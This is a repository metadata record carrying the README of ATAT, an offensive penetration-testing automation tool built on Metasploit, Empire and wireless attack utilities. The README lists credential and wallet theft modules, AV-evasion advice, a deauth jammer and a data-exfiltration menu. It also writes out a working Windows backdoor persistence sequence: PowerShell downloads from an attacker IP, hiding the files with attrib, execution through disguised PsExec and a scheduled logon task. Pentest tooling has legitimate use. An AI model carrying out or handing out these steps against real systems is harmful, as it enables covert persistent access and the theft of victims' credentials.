{"id":13681522,"url":"https://github.com/ll3N1GmAll/ATAT","last_synced_at":"2025-04-30T03:31:47.347Z","repository":{"id":44173440,"uuid":"125772627","full_name":"ll3N1GmAll/ATAT","owner":"ll3N1GmAll","description":"Attack Team Automation Tool - for automating penetration testing operations with industry standard tools.","archived":false,"fork":false,"pushed_at":"2023-12-04T05:43:26.000Z","size":20698,"stargazers_count":33,"open_issues_count":0,"forks_count":5,"subscribers_count":3,"default_branch":"master","last_synced_at":"2024-11-12T00:36:44.827Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Shell","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/ll3N1GmAll.png","metadata":{"files":{"readme":"README.txt","changelog":null,"contributing":null,"funding":null,"license":"LICENSE.md","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null}},"created_at":"2018-03-18T22:16:15.000Z","updated_at":"2024-08-16T17:01:25.000Z","dependencies_parsed_at":"2024-01-14T15:25:58.086Z","dependency_job_id":"a6a6ed66-9cdf-4fc5-8536-c7d8aa9acced","html_url":"https://github.com/ll3N1GmAll/ATAT","commit_stats":{"total_commits":375,"total_committers":2,"mean_commits":187.5,"dds":"0.026666666666666616","last_synced_commit":"6b5b674d3f2b8450966c456a5d68ca4ce53ebe02"},"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ll3N1GmAll%2FATAT","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ll3N1GmAll%2FATAT/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ll3N1GmAll%2FATAT/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ll
3N1GmAll%2FATAT/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/ll3N1GmAll","download_url":"https://codeload.github.com/ll3N1GmAll/ATAT/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":251635359,"owners_count":21619208,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-02T13:01:31.857Z","updated_at":"2025-04-30T03:31:42.335Z","avatar_url":"https://github.com/ll3N1GmAll.png","language":"Shell","funding_links":[],"categories":["Shell"],"sub_categories":[],"readme":"***RTFM***RTFM***RTFM***RTFM***\n\nRun all dependency checker options to install all necessary tools before submitting any issues!\n\n# ATAT\nAttack Team Automation Tool for automating penetration testing operations. \n\nInterface and concept based on ezsploit by rand0m1ze. 
\nDurandal backdoor builder created by Travis Weathers (Skysploit); C code updated by ll3N1GmAll for newer gcc-mingw-w64-i686 compiler compatibility.\n\nv1.9.5\nAdded support for Hashcat GPU cracking\nAdded support for SpiderLabs' Spray password spray utility for SMB, OWA, Lync, Cisco VPN\nAdded support for BeRoot (Installation only at present; automation coming soon...)\nAdded support for GhostPack C# tools from SpecterOps (tool acquisition and setup only; full usage and automation features coming soon...)\nAdded support for Powershell wireless credential dumper\nAdded support for LaZagne credential harvester\nAdded support for LinEnum *nix Privilege Escalation checks\nAdded support for Bashark Post Exploitation Framework\nAdded support for Pupy Cross Platform Post Exploitation Framework\nAdded support for changeme Default Credential Checker\nAdded support for parsing Nmap output to feed SSLScan\nAdded Automated File Push and Exfiltration support\nAdded support for Bloodhound\nAdded support for HostAPD-WPE, Asleap, John the Ripper, \u0026 Airgeddon Integration,\nAdded Powershell Empire \u0026 DeathStar Integration, (PSE support downgraded to BETA until PSE 3 release integration)\nAdded support for Apache Struts/Tomcat/Etc. 
exploits,\nAdded support for Java JMX exploitation,\nAdded support for Java RMI exploitation,\nAdded support for linux post exploitation,\nAdded support for load balancer detection,\nAdded support for SSLScan (automated via masscan results),\nAdded support for Masscan of all TCP ports (informs SSLScan),\nAdded Android persistent reverse Meterpreter APK builder,\nAdded DBD persistent backdoor builder by Skysploit with enhanced persistence instructions,\nAdded dependency checker by Skysploit,\nAdded fully automated cross-platform MSF Post Exploitation on all sessions acquired for the following post ex activities:\n- enumerate hosts\n- dump cached domain creds\n- verify if you are on a vm\n- group policy preferences (dump local admin creds if pushed via GPO)\n- steal SVN creds (code repository)\n- steal scp creds\n- enumerate internal sites the user visits\n- all apps installed on target\n- Chrome, dump cookies, and saved creds\n- IE, dump cookies, and saved creds\n- Firefox, dump cookies, and saved creds\n- grab RDP sessions\n- grab local settings and local accounts\n- dumps WPA PSK \u0026 WEP passwords\n- dumps passwords on the local windows system including domain accounts\n- dump .ssh directory for known hosts\n- gather OS environment variables\n- dump /etc/shadow\n- dump user list plus bash/mysql/vim/lastlog/sudoers history\n- enum packages, services, mounts, user list, bash\n- check for AV, rootkit, HIDS/HIPS, firewalls, etc\n- dump IPTables, interfaces, wifi info, open ports\n- collect config files for commonly installed apps and services\n- grab arp table from target\n- enumerate the domain, domain users, and domain tokens\n- grab the host file\n- dump logged on users\n- dump MS product keys\n- steal VNC creds\n- enumerate services \u0026 shares on target\n- steal SNMP information\n- dump DNS cache\n- steal GPG credentials/certificates\n- grab the history of mounted USB devices\n- assess the target and suggest local exploits for privilege escalation or other 
operations\n- geolocate targets\n- grab credentials from just about anything imaginable including LastPass, Jenkins, Jboss, irssi, gpg, pgpass, pidgin, etc. etc. (the list grows constantly)\n- steal Bitcoin Wallet\n- Bitlocker Master Key (FVEK) Extraction\n- and a ton more!\n\n!!NOT RECOMMENDED!!--- INSTRUCTIONS TO RUN THIS FROM /home/\u003cprofile\u003e/ instead of running as root (Doing this will break Empire \u0026 DeathStar functionality as well as some Wireless Attacks functionality)---\nThe ATAT folder must be duplicated in /root \u0026 ~/ to run properly unless you are on Kali (logged in as root) or you are running\nanother distro logged in as root (duplicating this folder only needs to be done once and does not need to be updated ever).\nYou then do not have to run the script from /root if you place one copy of the ATAT folder in ~/ and one copy in /root.\nPlacing a copy of the ATAT folder in /root/ in this circumstance is only so you have the TXT files \naccessible by ATAT when it is run as sudo. Then you simply run ATAT via sudo ./ATAT.sh from ~/ATAT.\nAll targets and/or ports must be added into their respective TXT files in /root/ as referenced above and detailed below.\nAdding your targets/ports to the TXT files in ~/ATAT will not work under this setup.\n*You can (and should) have the ATAT folder in /root only if you wish; and you can run it from there disregarding all of these instructions.*\n\n**ParrotOS Users (and any distros using the firejail sandbox):**\nYou must navigate to /root/ATAT/ in a $ (non-root) terminal prompt. Then launch ATAT with \"sudo ./ATAT.sh\". Otherwise, firejail will break functionality. Launching in this manner resolves all firejail issues that I know of.\n\nusage:\nchmod +x ~/ATAT/ATAT.sh\ncd ATAT\nsudo ./ATAT.sh\n\nYou MUST load your PORTS or IPs into their appropriate TXT files for options listed below to work! 
(one per line)\n\nOPTION Multi-Target:\n/root/ATAT/MSF_targets.txt\n\nOPTION Multi-Port:\n/root/ATAT/MSF_target_ports.txt\n\nOPTION Multi-Port Auxiliary:\n/root/ATAT/MSF_AUX_target_ports.txt\n\nOPTION Multi-Target Struts \u0026 Multi-Target Tomcat:\n/root/ATAT/MSF_targets.txt\n\nOPTION Multi-Target Java JMX \u0026 Multi-Target Java RMI:\n/root/ATAT/MSF_targets.txt\n\nOPTION Multi-Target SNMP Enumeration:\n/root/ATAT/MSF_targets.txt\n\nOPTION Multi-Target Load Balancer Detection:\n/root/ATAT/MSF_targets.txt\nResults output to screen and the ATAT folder in LBD_Results.txt.\nOUTPUT FILES APPEND DATA DUE TO THE NATURE OF THESE LOOPED OPERATIONS; THEREFORE, ALL OUTPUT FILES MUST BE DELETED OR CLEANED OUT PERIODICALLY TO GET RID OF PREVIOUS SCANS' RESULTS\n\nOPTION Multi-Target SSLScan:\n~/ATAT/~SSLScan_masscan_results.txt \nTargets can be entered as just IPs/URLs for scanning on the default port 443; or you can enter colon-delimited entries to specify the port to scan each target on, as follows:\n1.2.3.4:22\n1.2.3.4:8443\n1.3.4.5:990\n1.3.4.5:547\nResults output to screen and the ATAT folder in SSLScan_Results.txt. All output is further processed and grouped into the following categories:\nRC4 findings in rc4.txt\nSSLv2 findings in sslv2.txt\nHeartbleed Findings in heartbleed_targets.txt\nFreak vuln findings in freak.txt\nWeak Cipher Findings in weak_ciphers.txt\nExpired Certificate Findings in expired_certs.txt\nSSL Certificate Details in ssl_certs.txt\nMasscan results also output to ~SSLScan_masscan_results.txt. 
This file contains all targets and discovered ports colon-delimited, one per line as above.\nSSLScan can be run automatically after running masscan to check for SSL issues on all discovered ports on every host in scope effortlessly.\nOUTPUT FILES APPEND DATA DUE TO THE NATURE OF THESE LOOPED OPERATIONS; THEREFORE, ALL OUTPUT FILES MUST BE DELETED OR CLEANED OUT PERIODICALLY TO GET RID OF PREVIOUS SCANS' RESULTS\n\nOPTION Masscan All TCP Ports:\n/root/ATAT/MSF_targets.txt\nThis masscans all TCP ports for all targets at a reasonable rate (--rate 1000).\nResults output to screen and the ATAT folder in Open_Ports.txt.\nMasscan results also output to ~SSLScan_masscan_results.txt. This file contains all targets and discovered ports colon-delimited, one per line as follows:\n1.2.3.4:22\n1.2.3.4:8443\n1.3.4.5:990\n1.3.4.5:547\nSSLScan can be run automatically after running masscan to check for SSL issues on all discovered ports on every host in scope effortlessly.\nOUTPUT FILES APPEND DATA DUE TO THE NATURE OF THESE LOOPED OPERATIONS; THEREFORE, ALL OUTPUT FILES MUST BE DELETED OR CLEANED OUT PERIODICALLY TO GET RID OF PREVIOUS SCANS' RESULTS\n\nOPTION Dependency Checker:\nThe Dependencies option will attempt to install the required dependencies for ATAT. The DBD Installer option must be run on your attacker box in order to receive DBD reverse shells.\nPowershell Empire \u0026 DeathStar Option Should Only Be Run If You Are Logged In As root!!\n\nOPTION Persistence:\nPLEASE DO NOT submit payloads generated to virustotal or any other online scanner!!\nDBD reverse shells will self heal a dropped connection at 10 minute intervals. If the connection is killed on either end or is lost for any reason, the connection will reconnect after a 10 minute period. 
All sessions are 128-bit AES encrypted.\n\nWINDOWS:\nATAT creates a taskmgnt.txt \u0026 winmgnt.txt for Windows DBD builder option payloads and places them in the /var/www/html/ directory before starting Apache on the attacker's machine (to host the payloads for access by the target machines). Both of these TXT files must be converted to EXE format once they have been transmitted to the target. Taskmgnt (nominally obfuscated PSEXEC) can be used to execute the winmgnt (DBD backdoor) so it is executed by a MS signed binary for more stealth/evasion. DBD itself is not currently flagged by any AV; but sometimes it is necessary to have your EXE run by a MS signed binary.\nWindows deployment instructions for reboot persistence:\nOption \"DBD Reboot Persistence Generator - Windows\" will create the following BAT file with all of these steps and place it here: ~/ATAT/DBD_reboot.bat (You must have a SYSTEM shell, upload the BAT file to the %WINDIR%\\System32\\ directory, and run DBD_reboot.bat from the same directory)\nNow move the \"taskmgnt.txt\" \u0026 \"winmgnt.txt\" files to the target, rename \u0026 hide them, then launch the backdoor with MS signed obfuscated PsExec.\nWhile this backdoor is self healing, it will not auto start at reboot. 
To get your shell back after a reboot, enter the following on the target (one command per line):\n\npowershell (new-object System.Net.WebClient).DownloadFile('http://\u003cATTACKER_IPADDRESS\u003e/winmgnt.txt','%WINDIR%\\System32\\winmgnt.exe')\npowershell (new-object System.Net.WebClient).DownloadFile('http://\u003cATTACKER_IPADDRESS\u003e/taskmgnt.txt','%WINDIR%\\System32\\taskmgnt.exe')\nattrib +H +S \\\"%WINDIR%\\System32\\winmgnt.exe\\\"\nattrib +H +S \\\"%WINDIR%\\System32\\taskmgnt.exe\\\"\n%WINDIR%\\System32\\taskmgnt.exe -i -d -s /accepteula %WINDIR%\\System32\\winmgnt.exe\nschtasks /create /sc onlogon /tn WindowsMgr /rl highest /tr \\\"%WINDIR%\\System32\\winmgnt.exe\\\"\n\n*NIX:\nATAT creates a 'dbd' binary for *nix DBD builder option payloads and places it in the /var/www/html/ directory. \n\nFor post exploitation once you acquire sessions via ATAT,\n\nMETHOD 1: \nLaunch your listener with menu option 2. ATAT will intelligently detect the appropriate post modules to run against each session you receive.  
However, due to a bug in the MSF AutoRunScript feature you must do the following: From your listener window, after all of your sessions are in (after your attacks have completed), hit enter to drop down to your msf exploit(multi/handler)\u003e prompt and then enter the following command without double quotes: \"resource '/root/ATAT/ATAT_multi_post.rc'\". Check your loot files in /root/.msf4/loot/\n\nMETHOD 2:\nThis will be updated once the aforementioned feature has been fixed by Rapid7.\n\nOPTION Empire \u0026 DeathStar:\nTHIS SECTION ONLY WORKS FROM THE /root/ CONTEXT!!\nIF YOU'RE NOT LOGGED IN AS root, DO NOT USE THESE OPTIONS!!\nEmpire \u0026 DeathStar MUST be installed in /root/!!\nOnly Launch DeathStar (Step 2) If Your Goal Is To Automate Domain Admin Credential Acquisition\n\nStep 1 must be run initially; after that you need to open another ATAT instance in a separate window and launch Step 2 to use DeathStar for domain admin credential acquisition automation. Run Step 3 to get the auth token for PSE's REST API; this is required for all other PSE options to work.\nStep 3 MUST be run once (and only once for a single PSE install; meaning you only need to run it again if you uninstall/reinstall, or you are using ATAT's PSE options to hit a PSE install on a separate machine). This step grabs the permanent auth token for the PSE REST API. You must use the temporary auth token displayed in the PSE console at startup to run this process. 
After this step you will no longer need to worry about the API auth token (this is stored in plaintext in your ATAT directory; delete ~/ATAT/PSE_perm_token.txt after your operation and re-run step 3 at the beginning of each operation to enhance opsec).\nPost exploitation features are a work in progress!\nBetter support and information for stagers will be provided as support for them grows.\n\nOPTION Wireless Attacks:\n1) Remove Wireless NIC from Network Manager - Removes the NIC you wish to use in a HostAPD-WPE attack from being managed by NetworkManager. This is essential for the attack to work.\n2) Reset Wireless NIC for Network Manager Usage - Allows NetworkManager to manage your wireless NIC after your attack is complete. This allows you to join wireless networks and operate the wireless NIC normally.\n3) HostAPD-WPE Enterprise WiFi Fake RADIUS Server Attack - Performs HostAPD-WPE attack to capture enterprise WPA credentials for cracking with the Asleap option.\nThe RTL8187 or Alfa AWUS036H is, sadly, NOT supported. Also, your wireless chipset is likely not supported by HostAPD-WPE if you receive this error:\nConfiguration file: /etc/hostapd-wpe/hostapd-wpe2.conf\nnl80211: Could not configure driver mode\nnl80211: deinit ifname=wlan0 disabled_11b_rates=0 \nnl80211 driver initialization failed. \nwlan0: interface state UNINITIALIZED-\u003eDISABLED \nwlan0: AP-DISABLED \nhostapd_free_hapd_data: Interface wlan0 wasn't started\n\n4) Airgeddon - Launch airgeddon wireless script by v1s1t0r\n5) Multi-Target Asleap Attack - Perform dictionary attack against all users captured by the HostAPD-WPE attack. 
(better for fewer targets because usernames aren't paired with passwords in the output file)\nOUTPUT FILES APPEND DATA DUE TO THE NATURE OF THESE LOOPED OPERATIONS; THEREFORE, ALL OUTPUT FILES MUST BE DELETED OR CLEANED OUT PERIODICALLY TO GET RID OF PREVIOUS OPERATION'S RESULTS\n6) Multi-Target John The Ripper Attack - Perform dictionary attack against all users captured by the HostAPD-WPE attack.\n7) WiFi Jammer - *This Attack Is ILLEGAL If Not Conducted In A Controlled Environment That Is Free Of Networks That Are Not In Scope!! Use Responsibly \u0026 With Great Caution!* This is an automated deauth attack that detects all access points \u0026 clients in range. This attack will hold down the 'user defined number' of closest clients indefinitely. A Yagi is recommended for long range, more precise targeting.\n\nOPTION Data Exfiltration:\n1) Push File To Target with SCP - Creds Required - Creates SCP syntax for pushing files to a *nix machine you have valid credentials to.\n2) Data Exfiltration - Creates Meterpreter syntax for downloading files from a target\n3) Push File To Target with PSH / Meterpreter - Creates meterpreter and powershell syntax for pushing files up to a target. PSH method starts Apache and provides a powershell command to run on your target that will download whatever file specified from your attacker machine. MSF method creates meterpreter syntax for uploading a specified file to your target at whatever location you specify.\n4) Wireless Password Stealer - Creates powershell syntax to dump all wireless passwords in plaintext; admin rights required.\n5) Windows 64 bit Credential \u0026 Loot Harvester - Uses an obfuscated version of the excellent LaZagne Project (https://github.com/AlessandroZ/LaZagne) to steal nearly every conceivable password/private key/etc. 
from a target machine.\n6) Windows 32 bit Credential \u0026 Loot Harvester - Uses an obfuscated version of the excellent LaZagne Project (https://github.com/AlessandroZ/LaZagne) to steal nearly every conceivable password/private key/etc. from a target machine.\n\nOPTION changeme Default Credential Checker:\nA default credential scanner by ztgrace (https://github.com/ztgrace/changeme)\n\nOPTION Imperial Research Laboratory:\n1) Weblogic Java Deserialization RCE - This proof of concept code will demonstrate the ability to run a ping command on the intended targets via exploitation of a Weblogic java deserialization remote code execution vulnerability. It will open a window with tcpdump running to receive the pings from each intended target. It will then open 1 window at a time for each target on your MSF_targets.txt list. These windows will attempt to exploit the target and then close themselves once the attack has completed. Each target will be attacked in this manner. Any successful attacks will result in a ping from one of your targets showing up in the initial tcpdump window that opens and remains open. This is your indicator that the target is vulnerable. This attack should be run a few times to make sure the targets are not vulnerable. The exploit does not always trigger successfully the first couple of times.\n\nOPTION Hashcat Password Recovery:\nThis is for 64 bit machines only. The dictionary attacks automatically use the OneRuleToRuleThemAll rule set. There must be NO spaces in your file name \u0026 path when entering the full paths and file names for your hash files, dictionary files, and output files.\nRun The \"Hashcat Install\" From The Dependency Checker BEFORE Using This Option!\nUsernames \u0026 Hashes Option Works For pwdump Type Output With Usernames Present In Dump File. \nCrack with \"Hashes Only\" Options Whenever Possible For Greatly Increased Speed. 
\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fll3N1GmAll%2FATAT","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fll3N1GmAll%2FATAT","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fll3N1GmAll%2FATAT/lists"}